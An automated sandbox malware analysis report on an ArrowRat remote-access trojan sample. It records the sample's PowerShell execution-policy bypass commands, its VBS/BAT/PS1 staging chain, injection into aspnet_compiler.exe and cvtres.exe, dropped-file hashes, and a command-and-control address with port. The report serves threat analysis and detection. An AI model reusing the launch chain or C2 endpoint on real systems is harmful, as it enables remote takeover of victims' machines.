Malware Analysis Report

2024-10-10 10:15

Sample ID 230517-w5a1ysfb3z
Target 222.txt
SHA256 abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd
Tags
arrowrat client persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd

Threat Level: Known bad

The file 222.txt was found to be: Known bad.

Malicious Activity Summary

arrowrat client persistence rat

ArrowRat

Modifies Installed Components in the registry

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-17 18:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-17 18:29

Reported

2023-05-17 18:33

Platform

win7-20230220-en

Max time kernel

30s

Max time network

33s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\222.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\222.ps1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1

Network

N/A

Files

memory/2008-58-0x000000001B280000-0x000000001B562000-memory.dmp

memory/2008-59-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2008-60-0x0000000002350000-0x00000000023D0000-memory.dmp

memory/2008-61-0x0000000002350000-0x00000000023D0000-memory.dmp

memory/2008-62-0x0000000002350000-0x00000000023D0000-memory.dmp

memory/2008-63-0x0000000002350000-0x00000000023D0000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.vbs

MD5 8444901b66d6f83f3a684f1b44646868
SHA1 69c9c40aef3734959b4ce5f07005bf13c07646f9
SHA256 cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da
SHA512 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

C:\ProgramData\Unlimited\ISO\Binnot.bat

MD5 f1d747a7825a5db756d428a5254d244e
SHA1 7db56fe57492bd856c787cd2a836eff4f2ce5e01
SHA256 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf
SHA512 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 340e1993eb40b8bed81349fab46f89c5
SHA1 13acc43c5621e815bf6c8371f360b9fa29625fdc
SHA256 7caa47d4b27f7a6b91453329a3471a0b06ff6f7c67fc060aa15ff98385e6e46c
SHA512 abc68892589462b10615969593c6f92be3f6d6afda4683314ced7c1b083f039e8b6986692e1eb320b4f982041334a6c34f6b84502cb171c917478fb37b9093d9

memory/672-79-0x000000001B290000-0x000000001B572000-memory.dmp

memory/672-80-0x00000000022F0000-0x00000000022F8000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.ps1

MD5 58ef18971b1520648e0c6d67036251ff
SHA1 68bd1ee657ff233f6a1ee453914aaecdeb845284
SHA256 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3
SHA512 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

memory/672-82-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/672-83-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/672-84-0x0000000002530000-0x00000000025B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-17 18:29

Reported

2023-05-17 18:33

Platform

win10v2004-20230220-en

Max time kernel

149s

Max time network

154s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\222.ps1

Signatures

ArrowRat

rat arrowrat

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1013461898-3711306144-4198452673-1000\{87E2689E-2912-4625-B426-1D3CF6DF3F78} C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1436 wrote to memory of 4100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1436 wrote to memory of 4100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4100 wrote to memory of 4220 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4100 wrote to memory of 4220 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4220 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4220 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 4952 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4472 wrote to memory of 4952 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4952 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1684 wrote to memory of 3584 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\explorer.exe
PID 1684 wrote to memory of 3584 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\explorer.exe
PID 1684 wrote to memory of 2660 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\222.ps1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1

C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 50.4.107.13.in-addr.arpa udp
US 20.189.173.12:443 tcp
US 8.8.8.8:53 73.254.224.20.in-addr.arpa udp
US 93.184.220.29:80 tcp
NL 87.248.202.1:80 tcp

Files

memory/1436-138-0x0000029038170000-0x0000029038192000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eeamc5sh.ab5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1436-143-0x00000290366E0000-0x00000290366F0000-memory.dmp

memory/1436-144-0x00000290366E0000-0x00000290366F0000-memory.dmp

memory/1436-145-0x00000290366E0000-0x00000290366F0000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.vbs

MD5 8444901b66d6f83f3a684f1b44646868
SHA1 69c9c40aef3734959b4ce5f07005bf13c07646f9
SHA256 cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da
SHA512 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

C:\ProgramData\Unlimited\ISO\Binnot.bat

MD5 f1d747a7825a5db756d428a5254d244e
SHA1 7db56fe57492bd856c787cd2a836eff4f2ce5e01
SHA256 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf
SHA512 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 223bd4ae02766ddc32e6145fd1a29301
SHA1 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA256 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

memory/2300-160-0x000001D058610000-0x000001D058620000-memory.dmp

memory/2300-161-0x000001D058610000-0x000001D058620000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3003448ee73abf14d5c8011a37c40600
SHA1 b88e9cdbae2e27a25f0858fc0b6d79533fb160d8
SHA256 ae448d99735879ecee1dc3088c8f7553ebff461b96172d8f3cb5ff2fa2a12d4a
SHA512 0fe52614eec6d75a265ae380aaa1eb153bc35a1baae4d118637798575169d9dba5ad751efab5d7f5dbe9764bfb96e9ae76577a3487429a3383b5b08d5402fe3a

C:\ProgramData\Unlimited\ISO\Binnot.ps1

MD5 58ef18971b1520648e0c6d67036251ff
SHA1 68bd1ee657ff233f6a1ee453914aaecdeb845284
SHA256 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3
SHA512 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

memory/2300-173-0x000001D058610000-0x000001D058620000-memory.dmp

C:\ProgramData\Unlimited\ISO\Unlimited.vbs

MD5 c281573a4f6f6ac5b06f2e9436400093
SHA1 c2699e56b7c26ac9cdfe1f500b49151b69bd6ad8
SHA256 3c312f2547fbc4a3ffe5c1b6d91c03494d7653fd758d886473f2ae6656de11f7
SHA512 76aed1be4b48d2fc019c9136eb74b3a96b56b89c74cb3b3347f8eefc592fee24a2a94ea3babd4b394080c7663864781c89afe761e59f8d65aed147d1ed422026

C:\ProgramData\Unlimited\ISO\Unlimited.bat

MD5 eff64d56c40c54a1f9891d7a6ad54899
SHA1 dbaf9a4aeb8484690d6118155d59158598f0799a
SHA256 c846b192c5dc974c6d63024a06d4c31b2f7c8baa61af133e5b00009b68df86e2
SHA512 c89f82c7807b947e10f82740c01d5cb996e95c4a6e79375eee6b981d0ed911d31537e964d0cefef874c7e12f9f4baf237f0f9ed44de866abd3c8030a25b7cc83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c77ce1db08e7f1b2bc9896a13b4f7a5
SHA1 3de7b852f908b16834f9484bce8eebd4d7389ec1
SHA256 dcb3cb7065cee59e6f4e62405ef4c5418a04a35a1ac04db0b846851bc7ec967f
SHA512 5244fa2ce993c07dfbbeac86360c2e49e86c0957a016624251e917223b0d1c0afd5fefdf17b397b298c194b5699c8696dd7e59f379d6eae98665be361f077b29

C:\ProgramData\Unlimited\ISO\Unlimited.ps1

MD5 e1bb0ce912e111d3b891de922e21a739
SHA1 8ae8856cb82f3340b2b2b1a06b3123b549005549
SHA256 5f79c8a3a6ff96ae8ccf96dfc486ae1f5e8edeabb663e6f90be89aeb727457cc
SHA512 bbb85cb9160a52d1bf464b7b459caaf9f808407031c423790be65e820fc8cce39c99c6096110228e8a8b33ddf5bff75350cbda2f6b01fc500f5169a4142528bf

memory/2404-188-0x0000022D7F170000-0x0000022D7F180000-memory.dmp

memory/2404-189-0x0000022D7F170000-0x0000022D7F180000-memory.dmp

memory/2404-190-0x0000022D7F170000-0x0000022D7F180000-memory.dmp

memory/1684-191-0x0000000000400000-0x000000000042C000-memory.dmp

memory/1684-193-0x00000000059E0000-0x0000000005F84000-memory.dmp

memory/1684-194-0x0000000005510000-0x00000000055AC000-memory.dmp

memory/2660-195-0x0000000000400000-0x0000000000418000-memory.dmp

memory/2660-197-0x00000000053D0000-0x0000000005462000-memory.dmp

memory/2660-198-0x00000000056A0000-0x00000000056B0000-memory.dmp

memory/2660-199-0x0000000005BB0000-0x0000000005C16000-memory.dmp